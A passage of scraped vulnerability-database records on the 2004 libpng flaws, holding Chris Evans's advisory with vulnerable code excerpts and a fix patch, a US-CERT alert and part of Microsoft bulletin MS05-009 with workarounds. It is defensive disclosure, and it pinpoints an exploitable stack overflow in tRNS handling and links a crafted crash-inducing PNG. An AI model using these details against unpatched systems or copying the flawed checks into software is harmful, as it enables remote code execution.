"2018-08-31T11:10:10", "bulletinFamily": "software", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "\r\nCESA-2004-001 - rev 3\r\n\r\nlibPNG 1.2.5 stack-based buffer overflow and other code concerns\r\n================================================================\r\n\r\nPrograms : libpng users including mozilla, konqueror, various e-mail\r\n clients, generally lots. 
Also reports that some versions of\r\n IE are vulnerable to some of the problems.\r\nSeverity : - A malicious website serving a malicious PNG file could\r\n compromise the browsers of visitors.\r\n - A malicious PNG could be sent via e-mail and compromise\r\n the e-mail viewer of the recipient.\r\n - For systems with user-providable images for "face\r\n browsers", a local system compromise could be possible via\r\n a malicious PNG.\r\nCAN identifier(s): CAN-2004-0597 (the serious one), CAN-2004-0598,\r\n CAN-2004-0599\r\nCERT VU#s : VU#388984 (the serious one), VU#236656, VU#160448,\r\n VU#477512, VU#817368, VU#286464\r\n\r\nThis advisory lists code flaws discovered by inspection of the libpng-1.2.5\r\ncode. Only the first one has been examined in practice to confirm\r\nexploitability. The other flaws certainly warrant fixing.\r\n\r\nA patch which should plug all these issues is appended beneath the advisory.\r\nNOTE! This patch serves as demo purposes for the flaws only. An official\r\nv1.2.6 libpng with an official, slightly different fix will be released by\r\nthe libpng team in parallel with this advisory.\r\n\r\n1) Remotely exploitable stack-based buffer overrun in png_handle_tRNS\r\n(pngrutil.c)\r\n\r\nIf a PNG file is of the correct format, a length check on PNG data is missed\r\nprior to filling a buffer on the stack from the PNG data. 
The exact flaw would\r\nseem to be a logic error; failure to bail out of a function after a warning\r\ncondition is hit, here:\r\n\r\n if (!(png_ptr->mode & PNG_HAVE_PLTE))\r\n {\r\n /* Should be an error, but we can cope with it */\r\n png_warning(png_ptr, "Missing PLTE before tRNS");\r\n }\r\n else if (length > (png_uint_32)png_ptr->num_palette)\r\n {\r\n png_warning(png_ptr, "Incorrect tRNS chunk length");\r\n png_crc_finish(png_ptr, length);\r\n return;\r\n }\r\n\r\nWe can see, if the first warning condition is hit, the length check is missed\r\ndue to the use of an "else if".\r\n\r\nA PNG crafted to trip this is available at\r\nhttp://scary.beasts.org/misc/pngtest_bad.png\r\n\r\nIt crashes both mozilla and konqueror.\r\nA scarier possibility is targetted exploitation by e-mailing a nasty PNG to\r\nsomeone who uses a graphical e-mail client to decode PNGs with a vulnerable\r\nlibpng.\r\n\r\n\r\n2) Dangerous code in png_handle_sBIT (pngrutil.c) (Similar code in\r\npng_handle_hIST).\r\n\r\nAlthough seemingly not exploitable, there is dangerous code in this function.\r\nIt relies on checks scattered elsewhere in the code in order to not overflow\r\na 4-byte stack buffer. This line here should upper-bound the read onto the\r\nstack to 4 bytes:\r\n\r\n png_crc_read(png_ptr, buf, truelen);\r\n\r\n\r\n3) Possible NULL-pointer crash in png_handle_iCCP (pngrutil.c) (this flaw is\r\nduplicated in multiple other locations).\r\n\r\nThere are lots of lines such as these in the code:\r\n\r\n chunkdata = (png_charp)png_malloc(png_ptr, length + 1);\r\n\r\nWhere "length" comes from the PNG. If length is set to UINT_MAX then length + 1 will equate to\r\nzero, leading to the PNG malloc routines to return NULL and\r\nsubsequent access to crash. These lengths are sometimes checked to ensure\r\nthey are smaller that INT_MAX, but it is not clear that all code paths perform\r\nthis check, i.e. 
png_push_read_chunk in pngpread.c does not do this check\r\n(this is progressive reading mode as used by browsers).\r\n\r\n\r\n4) Theoretical integer overflow in allocation in png_handle_sPLT (pngrutil.c)\r\n\r\nThis isn't likely to cause problems in practice, but there's the possibility\r\nof an integer overflow during this allocation:\r\n\r\n new_palette.entries = (png_sPLT_entryp)png_malloc(\r\n png_ptr, new_palette.nentries * sizeof(png_sPLT_entry));\r\n\r\n\r\n5) Integer overflow in png_read_png (pngread.c)\r\n\r\nA PNG with excessive height may cause an integer overflow on a memory\r\nallocation and subsequent crash allocating row pointers. This line is possibly\r\nfaulty; I can't see anywhere that enforces a maximum PNG height:\r\n\r\n info_ptr->row_pointers = (png_bytepp)png_malloc(png_ptr,\r\n info_ptr->height * sizeof(png_bytep));\r\n\r\n\r\n6) Integer overflows during progressive reading.\r\n\r\nThere are many lines like the following, which are prone to integer overflow:\r\n\r\n if (png_ptr->push_length + 4 > png_ptr->buffer_size)\r\n\r\nIt is not clear how dangerous this is.\r\n\r\n\r\n7) Other flaws.\r\n\r\nThere is broad potential for other integer overflows which I have not spotted -\r\nthe amount of integer arithmetic surrounding buffer handling is large,\r\nunfortunately.\r\n\r\n\r\nCESA-2004-001 - rev 3\r\nChris Evans\r\nchris@scary.beasts.org\r\n\r\n[Advertisement: I am interested in moving into a security related field\r\n full-time. E-mail me to discuss.]\r\n\r\n\r\ndiff -ru libpng-1.2.5/png.h libpng-1.2.5.fix/png.h\r\n--- libpng-1.2.5/png.h 2002-10-03 12:32:26.000000000 +0100\r\n+++ libpng-1.2.5.fix/png.h 2004-07-13 23:18:10.000000000 +0100\r\n@@ -835,6 +835,9 @@\r\n /* Maximum positive integer used in PNG is (2^31)-1 */\r\n #define PNG_MAX_UINT ((png_uint_32)0x7fffffffL)\r\n\r\n+/* Constraints on width, height, (2 ^ 24) - 1*/\r\n+#define PNG_MAX_DIMENSION 16777215\r\n+\r\n /* These describe the color_type field in png_info. 
*/\r\n /* color type masks */\r\n #define PNG_COLOR_MASK_PALETTE 1\r\ndiff -ru libpng-1.2.5/pngpread.c libpng-1.2.5.fix/pngpread.c\r\n--- libpng-1.2.5/pngpread.c 2002-10-03 12:32:28.000000000 +0100\r\n+++ libpng-1.2.5.fix/pngpread.c 2004-07-13 23:03:58.000000000 +0100\r\n@@ -209,6 +209,8 @@\r\n\r\n png_push_fill_buffer(png_ptr, chunk_length, 4);\r\n png_ptr->push_length = png_get_uint_32(chunk_length);\r\n+ if (png_ptr->push_length > PNG_MAX_UINT)\r\n+ png_error(png_ptr, "Invalid chunk length.");\r\n png_reset_crc(png_ptr);\r\n png_crc_read(png_ptr, png_ptr->chunk_name, 4);\r\n png_ptr->mode |= PNG_HAVE_CHUNK_HEADER;\r\n@@ -638,6 +640,8 @@\r\n\r\n png_push_fill_buffer(png_ptr, chunk_length, 4);\r\n png_ptr->push_length = png_get_uint_32(chunk_length);\r\n+ if (png_ptr->push_length > PNG_MAX_UINT)\r\n+ png_error(png_ptr, "Invalid chunk length.");\r\n\r\n png_reset_crc(png_ptr);\r\n png_crc_read(png_ptr, png_ptr->chunk_name, 4);\r\ndiff -ru libpng-1.2.5/pngrutil.c libpng-1.2.5.fix/pngrutil.c\r\n--- libpng-1.2.5/pngrutil.c 2004-07-13 13:36:37.000000000 +0100\r\n+++ libpng-1.2.5.fix/pngrutil.c 2004-07-13 23:43:02.000000000 +0100\r\n@@ -350,7 +350,11 @@\r\n png_crc_finish(png_ptr, 0);\r\n\r\n width = png_get_uint_32(buf);\r\n+ if (width > PNG_MAX_DIMENSION)\r\n+ png_error(png_ptr, "Width is too large");\r\n height = png_get_uint_32(buf + 4);\r\n+ if (height > PNG_MAX_DIMENSION)\r\n+ png_error(png_ptr, "Height is too large");\r\n bit_depth = buf[8];\r\n color_type = buf[9];\r\n compression_type = buf[10];\r\n@@ -675,7 +679,7 @@\r\n else\r\n truelen = (png_size_t)png_ptr->channels;\r\n\r\n- if (length != truelen)\r\n+ if (length != truelen || length > 4)\r\n {\r\n png_warning(png_ptr, "Incorrect sBIT chunk length");\r\n png_crc_finish(png_ptr, length);\r\n@@ -1244,7 +1248,8 @@\r\n /* Should be an error, but we can cope with it */\r\n png_warning(png_ptr, "Missing PLTE before tRNS");\r\n }\r\n- else if (length > (png_uint_32)png_ptr->num_palette)\r\n+ if (length > 
(png_uint_32)png_ptr->num_palette ||\r\n+ length > PNG_MAX_PALETTE_LENGTH)\r\n {\r\n png_warning(png_ptr, "Incorrect tRNS chunk length");\r\n png_crc_finish(png_ptr, length);\r\n@@ -1400,7 +1405,7 @@\r\n void /* PRIVATE */\r\n png_handle_hIST(png_structp png_ptr, png_infop info_ptr, png_uint_32 length)\r\n {\r\n- int num, i;\r\n+ unsigned int num, i;\r\n png_uint_16 readbuf[PNG_MAX_PALETTE_LENGTH];\r\n\r\n png_debug(1, "in png_handle_hIST\n");\r\n@@ -1426,8 +1431,8 @@\r\n return;\r\n }\r\n\r\n- num = (int)length / 2 ;\r\n- if (num != png_ptr->num_palette)\r\n+ num = length / 2 ;\r\n+ if (num != png_ptr->num_palette || num > PNG_MAX_PALETTE_LENGTH)\r\n {\r\n png_warning(png_ptr, "Incorrect hIST chunk length");\r\n png_crc_finish(png_ptr, length);\r\n@@ -2868,6 +2873,9 @@\r\n png_read_data(png_ptr, chunk_length, 4);\r\n png_ptr->idat_size = png_get_uint_32(chunk_length);\r\n\r\n+ if (png_ptr->idat_size > PNG_MAX_UINT)\r\n+ png_error(png_ptr, "Invalid chunk length.");\r\n+\r\n png_reset_crc(png_ptr);\r\n png_crc_read(png_ptr, png_ptr->chunk_name, 4);\r\n if (png_memcmp(png_ptr->chunk_name, (png_bytep)png_IDAT, 4))", "edition": 1, "modified": "2004-08-05T00:00:00", "published": "2004-08-05T00:00:00", "id": "SECURITYVULNS:DOC:6579", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6579", "title": "CESA-2004-001: libpng", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nMultiple Vulnerabilities in libpng\r\n\r\n Original release date: August 4, 2004\r\n Last revised: --\r\n Source: US-CERT\r\n\r\nSystems Affected\r\n\r\n Applications and systems that use the libpng library.\r\n\r\nOverview\r\n\r\n Several vulnerabilities exist in the libpng library, the most serious\r\n of which 
could allow a remote attacker to execute arbitrary code on an\r\n affected system.\r\n\r\nI. Description\r\n\r\n The Portable Network Graphics (PNG) image format is used as an\r\n alternative to other image formats such as the Graphics Interchange\r\n Format (GIF). The libpng is a popular reference library available for\r\n application developers to support the PNG image format.\r\n\r\n Several vulnerabilities have been reported in the libpng library. Any\r\n application or system that uses this library may be affected. More\r\n detailed information is available in the individual vulnerability\r\n notes:\r\n\r\n VU#388984 - libpng fails to properly check length of transparency\r\n chunk (tRNS) data\r\n\r\n A buffer overflow vulnerability has been discovered in the way that\r\n libpng processes PNG images. This vulnerability could allow a remote\r\n attacker to execute arbitrary code on a vulnerable system by\r\n introducing a specially crafted PNG image.\r\n (Other references: CAN-2004-0597)\r\n\r\n VU#236656 - libpng png_handle_iCCP() NULL pointer dereference\r\n\r\n Under some circumstances, a null pointer may be dereferenced during a\r\n memory allocation in the png_handle_iCCP() function. As a result, a\r\n PNG image with particular characteristics could cause the affected\r\n application to crash. Similar errors are reported to exist in other\r\n locations within libpng.\r\n (Other references: CAN-2004-0598)\r\n\r\n VU#160448 - libpng integer overflow in image height processing\r\n\r\n An integer overflow error exists in the handling of PNG image height\r\n within the png_read_png() function. 
As a result, a PNG image with\r\n excessive height may cause an integer overflow during a memory\r\n allocation operation, which could cause the affected application to\r\n crash.\r\n (Other references: CAN-2004-0599)\r\n\r\n VU#477512 - libpng png_handle_sPLT() integer overflow\r\n\r\n A potential integer overflow error exists during a memory allocation\r\n operation within the png_handle_sPLT() function. It is unclear what\r\n practical impact this error might have on applications using libpng.\r\n (Other references: CAN-2004-0599)\r\n\r\n VU#817368 - libpng png_handle_sBIT() performs insufficient bounds\r\n checking\r\n\r\n A potentially insufficient bounds check exists within the\r\n png_handle_sBIT() function. A similar error exists in the\r\n png_handle_hIST() function. While the code that contains these errors\r\n could potentially permit a buffer overflow to occur during a\r\n subsequent png_crc_read() operation, it is unclear what practical\r\n vulnerabilities it might present in applications using libpng.\r\n (Other references: CAN-2004-0597)\r\n\r\n VU#286464 - libpng contains integer overflows in progressive display\r\n image reading\r\n\r\n The libpng library provides the ability to display interlaced, or\r\n progressive display, PNG images. A number of potential integer\r\n overflow errors exist in libpng's handling of such progressive display\r\n images. While the code that contains these errors introduces dangerous\r\n conditions, it is unclear what practical vulnerabilities it might\r\n present in applications using libpng.\r\n (Other references: CAN-2004-0599)\r\n\r\nII. 
Impact\r\n\r\n In the case of VU#388984, an attacker with the ability to introduce a\r\n malformed PNG image to a vulnerable application could cause the\r\n application to crash or could potentially execute arbitrary code with\r\n the privileges of the user running the affected application.\r\n\r\n In the case of VU#236656 and VU#160448, an attacker with the ability\r\n to introduce a malformed PNG image to a vulnerable application could\r\n cause the application to crash.\r\n\r\n The impacts of the other vulnerabilities described above are unclear.\r\n\r\n A remote attacker could cause an application to crash or potentially\r\n execute arbitrary code by convincing a victim user to visit a\r\n malicious web site or view an email message containing a malformed\r\n image.\r\n\r\nIII. Solution\r\n\r\nApply a patch or upgrade\r\n\r\n Apply the appropriate patch or upgrade as specified by your vendor.\r\n For vendor-specific responses, please see your vendor's web site or\r\n the individual vulnerability notes.\r\n\r\n For individuals who rely on the original source of libpng, these\r\n issues have been resolved in libpng version 1.2.6rc1 (release\r\n candidate 1).\r\n\r\nAppendix A. 
References\r\n\r\n * Chris Evans Security Advisory 2004.1 -\r\n <http://scary.beasts.org/security/CESA-2004-001.txt>\r\n * libpng Homepage - <http://libpng.sourceforge.net>\r\n * Portable Network Graphics (PNG) Homepage -\r\n <http://www.libpng.org/pub/png>\r\n * US-CERT Vulnerability Note VU#388984 -\r\n <http://www.kb.cert.org/vuls/id/388984>\r\n * US-CERT Vulnerability Note VU#817368 -\r\n <http://www.kb.cert.org/vuls/id/817368>\r\n * US-CERT Vulnerability Note VU#286464 -\r\n <http://www.kb.cert.org/vuls/id/286484>\r\n * US-CERT Vulnerability Note VU#477512 -\r\n <http://www.kb.cert.org/vuls/id/477512>\r\n * US-CERT Vulnerability Note VU#160448 -\r\n <http://www.kb.cert.org/vuls/id/160448>\r\n * US-CERT Vulnerability Note VU#236656 -\r\n <http://www.kb.cert.org/vuls/id/236656>\r\n * CVE CAN-2004-0597 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597>\r\n * CVE CAN-2004-0598 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598>\r\n * CVE CAN-2004-0599 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599>\r\n _________________________________________________________________\r\n\r\n US-CERT thanks Chris Evans for researching and reporting these\r\n vulnerabilities.\r\n _________________________________________________________________\r\n\r\n Feedback can be directed to the US-CERT Technical Staff.\r\n _________________________________________________________________\r\n\r\n The latest copy of this document can be found at:\r\n\r\n <http://www.us-cert.gov/cas/techalerts/TA04-217A.html>\r\n\r\n Copyright 2004 Carnegie Mellon University. 
Terms of use\r\n\r\n Revision History\r\n\r\n Aug 4, 2004: Initial release\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.2.1 (GNU/Linux)\r\n\r\niD8DBQFBER8VXlvNRxAkFWARAtSFAKCGG0ALkKpzC3fhY3jlGZQDyzN5TgCg9g9c\r\nlQD3Z5OoJ30TQenb8/lwjn0=\r\n=d+t3\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2004-08-05T00:00:00", "published": "2004-08-05T00:00:00", "id": "SECURITYVULNS:DOC:6578", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6578", "title": "US-CERT Technical Cyber Security Alert TA04-217A -- Multiple Vulnerabilities in libpng", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "cvelist": ["CVE-2004-1244", "CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "Microsoft Security Bulletin MS05-009\r\nVulnerability in PNG Processing Could Allow Remote Code Execution (890261)\r\n\r\nIssued: February 8, 2005\r\nVersion: 1.0\r\n\r\nSummary\r\nWho should read this document: Customers who use Microsoft Windows Media Player, Windows Messenger and MSN Messenger\r\n\r\nImpact of Vulnerability: Remote Code Execution\r\n\r\nMaximum Severity Rating: Critical\r\n\r\nRecommendation: Customers should apply the update immediately\r\n\r\nSecurity Update Replacement: This bulletin replaces a prior security update. 
See the frequently asked questions (FAQ) section of this bulletin for the complete list.\r\n\r\nCaveats: None\r\n\r\nTested Software and Security Update Download Locations:\r\n\r\nAffected Software: \r\n\r\n\u2022 Microsoft Windows Media Player 9 Series (when running on Windows 2000, Windows XP Service Pack 1 and Windows Server 2003) \u2013 Download the update\r\n \r\n\u2022 Microsoft Windows Messenger version 5.0 (standalone version that can be installed on all supported operating systems) \u2013 Download the update\r\n \r\n\u2022 Microsoft MSN Messenger 6.1 \u2013 Download the update\r\n \r\n\u2022 Microsoft MSN Messenger 6.2 \u2013 Download the update\r\n \r\n\u2022 Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (ME) \u2013 Review the FAQ section of this bulletin for details about these operating systems.\r\n \r\n\r\nNon-Affected Software: \r\n\r\n\u2022 Windows Media Player 6.4\r\n \r\n\u2022 Windows Media Player 7.1\r\n \r\n\u2022 Windows Media Player for Windows XP (8.0)\r\n \r\n\u2022 Windows Media Player 9 Series for Windows XP Service Pack 2\r\n \r\n\u2022 Windows Media Player 10\r\n \r\n\u2022 MSN Messenger for Mac\r\n \r\n\r\nTested Microsoft Windows Components:\r\n\r\nAffected Components:\r\n\r\n\u2022 Microsoft Windows Messenger version 4.7.0.2009 (when running on Windows XP Service Pack 1) \u2013 Download the update\r\n \r\n\u2022 Microsoft Windows Messenger version 4.7.0.3000 (when running on Windows XP Service Pack 2) \u2013 Download the update\r\n \r\n\r\nThe software in this list has been tested to determine if the versions are affected. Other versions either no longer include security update support or may not be affected. 
To determine the support lifecycle for your product and version, visit the following Microsoft Support Lifecycle Web site.\r\n\r\nTop of section\r\nGeneral Information\r\n Executive Summary \r\n\r\nExecutive Summary:\r\n\r\nThis update resolves a newly-discovered, public vulnerability. A remote code execution vulnerability exists in the processing of PNG image formats. The vulnerability is documented in the \u201cVulnerability Details\u201d section of this bulletin.\r\n\r\nAn attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nSeverity Ratings and Vulnerability Identifiers:\r\n\r\nVulnerability Identifiers Impact of Vulnerability Windows Media Player 9 Series CAN-2004-1244 Windows Messenger (All affected versions) CAN-2004-0597 MSN Messenger 6.1 and 6.2 CAN-2004-0597 \r\nPNG Processing Vulnerability- CAN-2004-1244\r\n Remote Code Execution\r\n Critical\r\n\r\n None\r\n None\r\n \r\nPNG Processing Vulnerability- CAN-2004-0597\r\n Remote Code Execution\r\n\r\n None\r\n Moderate\r\n Critical\r\n\r\n \r\nAggregate Severity of All Vulnerabilities\r\n \r\n Critical\r\n Moderate\r\n\r\n Critical\r\n\r\n \r\n\r\nThis assessment is based on the types of systems that are affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them.\r\n\r\nTop of section\r\n Frequently asked questions (FAQ) related to this security update \r\n\r\nWhat updates does this release replace?\r\nThis security update replaces a prior security bulletin for Windows Media Player only. 
The security bulletin ID and version that is affected is listed in the following table.\r\n\r\nBulletin ID Windows Media Player 9 Series MSN Messenger 6.1 \r\nMS03-021\r\n Replaced\r\n \r\n \r\nMS04-010\r\n \r\n Replaced\r\n \r\n\r\nHow does the extended support for Windows 98, Windows 98 Second Edition, and Windows Millennium Edition affect the release of security updates for these operating systems?\r\nMicrosoft will only release security updates for critical security issues. Non-critical security issues are not offered during this support period. For more information about the Microsoft Support Lifecycle policies for these operating systems, visit the following Web site.\r\n\r\nFor more information about severity ratings, visit the following Web site.\r\n\r\nNote A Critical security update for these platforms is available and is provided as part of this security bulletin and can be downloaded from the Windows Update Web site.\r\n\r\nAre Windows 98, Windows 98 Second Edition, or Windows Millennium Edition critically affected by any of the vulnerabilities that are addressed in this security bulletin?\r\nYes. Windows 98, Windows 98 Second Edition, and Windows Millennium Edition are critically affected by this vulnerability. A Critical security update for these platforms is available and is provided as part of this security bulletin and can be downloaded from the Windows Update Web site.\r\nFor more information about severity ratings, visit the following Web site.\r\n\r\nHow can I get an update for MSN Messenger?\r\nAn update for MSN Messenger is available via the download link under the Affected Software section of this bulletin. 
Additionally, an updated version of MSN Messenger will be offered directly to customers when they log into MSN Messenger beginning shortly after this update is released.\r\n\r\nWhy is the update to Windows Messenger 5.0 an upgrade to version 5.1 instead of an update to 5.0?\r\nDue to the architecture of Windows Messenger 5.0, it is not possible to provide an incremental patch. Any fix to Windows Messenger 5.0 requires the deployment of a completely updated Windows Messenger package, in this case the Windows Messenger 5.1 package.\r\n\r\nWhat functionality changes will this new version of Windows Messenger contain?\r\nAs well as including the security fix pertaining to this bulletin; Windows Messenger 5.1 contains some additional bug fixes over Windows Messenger 5.0. Full details are on the Windows Messenger 5.1 download page.\r\n\r\nCan I use the Microsoft Baseline Security Analyzer (MBSA) to determine if this update is required?\r\nMBSA will determine if this update is required for Windows Media Player. MBSA will not determine if this update is required for Windows Messenger or MSN Messenger. It will provide a note message to this effect. See Microsoft Knowledge Base Article 306460 for information regarding note messages in MBSA.\r\n\r\nMicrosoft has made available an Enterprise Update Scanning Tool (EST) to assist customers with the detection of needed security updates not currently supported by MBSA.\r\n\r\nFor detailed information about the programs that MBSA currently does not detect, see Microsoft Knowledge Base Article 306460\r\n\r\nWhat is the Enterprise Update Scanning Tool (EST)?\r\nAs part of an ongoing commitment to provide detection tools for bulletin-class security updates, Microsoft delivers a stand-alone detection tool whenever the Microsoft Baseline Security Analyzer (MBSA) and the Office Detection Tool (ODT) cannot detect whether the update is required for an MSRC release cycle. 
This stand-alone tool is called the Enterprise Update Scanning Tool (EST) and is designed for enterprise administrators. When a version of the Enterprise Update Scanning Tool is created for a specific bulletin, customers can run the tool from a command line interface (CLI) and view the results of the XML output file. To help customers better utilize the tool, detailed documentation will be provided with the tool. There is also a version of the tool that SMS customers can obtain that offers an integrated experience for SMS administrators.\r\n\r\nCan I use a version of the Enterprise Update Scanning Tool (EST) to determine whether this update is required?\r\nYes. Microsoft has created a version of the EST that will determine if you need to apply this update for all of the products listed under Affected Products above. Microsoft Knowledge Base Article 984193 describes the EST in detail, as well as provides a download link to the tool. There is also a version of this tool that SMS customers can obtain. See the following Microsoft Knowledge Base Article 894154.\r\n\r\nCan I use Systems Management Server (SMS) to determine if this update is required?\r\nYes. SMS can help detect and deploy this security update. SMS uses MBSA for detection; therefore, SMS has the same limitation listed earlier in this bulletin related to programs that MBSA does not detect. Additionally, there is a version of the EST that SMS customers can obtain that offers an integrated experience for SMS administrators. \r\nFor information about SMS, visit the SMS Web site.\r\n\r\nThe Security Update Inventory Tool is required for detecting Microsoft Windows and other affected Microsoft products. 
For more information about the limitations of the Security Update Inventory Tool, see Microsoft Knowledge Base Article 306460\r\n\r\nTop of section\r\n Vulnerability Details \r\n\r\n PNG Processing Vulnerability in Windows Media Player - CAN-2004-1244: \r\n\r\nA remote code execution vulnerability exists in Windows Media Player because it does not properly handle PNG files with excessive width or height values. An attacker could try to exploit the vulnerability by constructing a malicious PNG that could potentially allow remote code execution if a user visited a malicious Web site or clicked a link in a malicious e-mail message. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\n Mitigating Factors for PNG Processing Vulnerability in Windows Media Player- CAN-2004-1244: \r\n\r\n\u2022 In a Web-based attack scenario, an attacker would have to host a Web site that contains a Web page that is used to exploit this vulnerability through media containing a reference to a malicious PNG file. An attacker would have no way to force users to visit a Web site. Instead, an attacker would have to persuade them to visit the Web site, typically by getting them to click a link that takes them to the attacker's site or to a site that has been compromised by the attacker.\r\n \r\n\u2022 An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n \r\n\r\nTop of section\r\n Workarounds for PNG Processing Vulnerability in Windows Media Player - CAN-2004-1244: \r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. 
When a workaround reduces functionality, it is identified below.\r\n\r\nThere are several different attack vectors that Microsoft has identified for this vulnerability. Each attack vector has a different workaround.\r\n\r\n Static WMP File Extension Attack workaround \r\n\r\nDisassociate the WMP file extensions.\r\nDisassociate the file extensions (.ASX, .WAX, .WVX, .WPL, .WMX, .WMS, .WMZ) in Windows to avoid previewing or opening files that point to malformed PNG files.\r\n\r\nManual Steps \u2013 Windows Media Player method:\r\n\r\n\u2022 Launch Windows Explorer\r\n \r\n\u2022 On the Tools Menu select \u2018Folder Options\u2019\r\n \r\n\u2022 Select the \u2018File Types\u2019 tab\r\n \r\n\u2022 Scroll to find the .ASX file extension and then press the \u2018Delete\u2019 button\r\n \r\n\u2022 Repeat step 4 for each of the file extensions listed above.\r\n \r\n\r\nIn addition, enterprise customers can configure Outlook to block the dangerous files listed using the steps documented in Microsoft Knowledgebase Article 837388. Use these instructions to add the documented file extensions to the Level1 block list.\r\n\r\nHome users can configure Outlook Express to block the dangerous files listed using the steps documented in Microsoft Knowledge Base Article 291387. Use this information to configure each of the file extensions as \u2018confirm open after download\u2019 in the Windows file types dialog.\r\n\r\nImpact of Workaround: Deleting the file associations with Media Player has a high potential for breaking corporate users who may be using Windows Media Server / Player to deliver web casts, training etc.\r\n\r\nHome users trying to watch streaming content on various Web sites may also be impacted by implementing this workaround.\r\n\r\nTop of section\r\n Internet Explorer workaround for WMP ActiveX attack \r\n\r\nDisable the Windows Media Player ActiveX Control. 
To protect against an attack from within a Web page, follow these steps to disable the Windows Media Player ActiveX Control:\r\n\r\nFollow the instructions documented in Microsoft Knowledge Base Article 240797 to set the kill bit for the following CLSIDs in Internet Explorer:\r\n\r\nCLSID:{6BF52A52-394A-11D3-B153-00C04F79FAA6}PROGID:WMPlayer.OCX.7\r\nCLSID:{22D6F312-B0F6-11D0-94AB-0080C74C7E95}PROGID:MediaPlayer.MediaPlayer.1\r\nCLSID:{05589FA1-C356-11CE-BF01-00AA0055595A}PROGID:AMOVIE.ActiveMovieControl.2\r\n\r\nImpact of Workaround:\r\n\r\nWhen you disable the Windows Media Player ActiveX control, pages using this control will no longer function as designed. This prevents any content from being played through the control, including audio and video.\r\n\r\nTop of section\r\n Content-Type HTTP Header Attack \r\n\r\nThe only way to prevent this attack is to remove from the registry all of the MIME type entries that associate Windows Media Player with the MIME type listed in the Content-Type header returned by the server, since any of them can be abused to exploit the vulnerability. 
Below is a list of MIME types that are associated with the WMP CLSID.\r\n\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\application/vnd.ms-wpl\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-mplayer2\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-ms-wmd\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-ms-wmz\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/aiff\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/basic\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mid\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/midi\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mp3\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mpeg\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mpegurl\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mpg\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/wav\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-aiff\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mid\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-midi\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mp3\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mpeg\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mpegurl\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mpg\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-ms-wax\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-ms-wma\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-wav\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\midi/mid\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/avi\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/mpeg\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/mpg\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/msvideo\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ivf\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-mpeg\r\nHKEY_CLASSES_ROOT\MIME\Database\Content 
